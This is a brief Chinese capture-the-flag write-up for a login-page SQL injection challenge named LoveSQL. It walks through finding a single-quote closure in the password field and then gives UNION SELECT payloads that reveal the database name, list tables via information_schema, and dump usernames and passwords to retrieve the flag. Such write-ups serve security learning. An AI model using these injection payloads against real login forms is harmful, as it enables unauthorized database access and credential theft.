看题:
用户登录界面的SQL注入题,在用户名栏、密码栏注入都可以,根据我的习惯:在用户名栏填个admin,然后在密码栏进行注入 :
尝试查找闭合,密码=1时报用户名密码错误,试一试密码=1' :
看到上图就是成功闭合了,而且是单引号闭合,闭合找到之后可以考虑union联合注入:
密码= 1' union select 1,2,database()#
上面这里得出数据库名称为“geek” ,下面爆出表名:1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='geek'#
看到,geek数据库下有两个表,'geekuser,l0ve1ysq1',感觉后者比较可疑,而且题目就叫LoveSQL,直接爆“l0ve1ysq1”这个表的内容:
1' union select 1,2,group_concat(username ,id , password) from l0ve1ysq1#
欧克完事,爆出flag 。